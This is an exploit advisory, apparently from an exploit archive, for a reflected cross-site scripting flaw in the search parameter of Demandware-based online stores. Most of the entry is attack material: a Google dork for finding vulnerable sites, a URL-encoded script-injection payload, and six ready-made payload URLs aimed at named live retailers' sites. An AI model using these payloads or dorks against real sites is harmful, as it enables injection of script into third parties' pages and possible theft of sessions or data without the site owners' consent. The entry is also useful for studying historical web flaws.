# Exploit Title: Demandware Store XSS Vulnerability # Date: 2013-02-10 # Author: Cyb3rgh0st aka Rajat # Vendor or Software Link: http://www.demandware.com/ # Version: n/a # Category: webapps/php # Google Keywords: inurl:on/demandware.store/ or inurl:default/Search-Show?q= # Tested on: Windows 7 and Backtrack rc3 #POC: http://www.example.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q={/exploit/XSS} exploit="1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E"(without quotes) # Demo site: 1.http://www.crocs.com/on/demandware.store/Sites-crocs_us-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E 2.http://www.sorel.com/on/demandware.store/Sites-Sorel_US-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E 3.http://www.cpopowermatic.com/on/demandware.store/Sites-powermatic-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script> 4.http://www.elc.co.uk/on/demandware.store/Sites-ELCENGB-Site/default/Search-Show?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E 5.http://www.jochen-schweizer.de/on/demandware.store/Sites-JSShop-Site/default/Search-Show?q=1%3b<%2fscript><script>alert(/xss/);</script> 6.http://www.callawaygolfpreowned.com/search/results,default,sc.html?q=1%3b%3C%2fscript%3E%3Cscript%3Ealert%28/xss/%29;%3C/script%3E #Greetz to Team Indishell !!!